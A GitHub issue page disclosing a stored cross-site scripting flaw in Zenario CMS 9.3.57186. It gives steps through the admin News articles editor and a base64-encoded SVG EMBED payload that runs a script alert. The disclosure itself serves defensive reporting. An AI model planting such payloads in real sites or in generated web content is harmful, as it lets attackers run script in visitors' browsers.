Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in News articles #3

Closed
hieuminhnv opened this issue Oct 17, 2022 · 0 comments
Closed

Stored XSS in News articles #3

hieuminhnv opened this issue Oct 17, 2022 · 0 comments

Comments

@hieuminhnv
Copy link
Owner

Summary
hi team,
I found small Stored XSS

Info

Zenario 9.3.57186 last version
FireFox 105.0.3 (64-bit)
image

Steps

Login to account http://xxx.xxx.x.x/admin.php?
image

in tab Menu, choose News articles
Click New News articles >> in tab Meta Data inject code into Summary and tab Main content >> save
image
image
image

payload: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" `AllowScriptAccess="always">

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant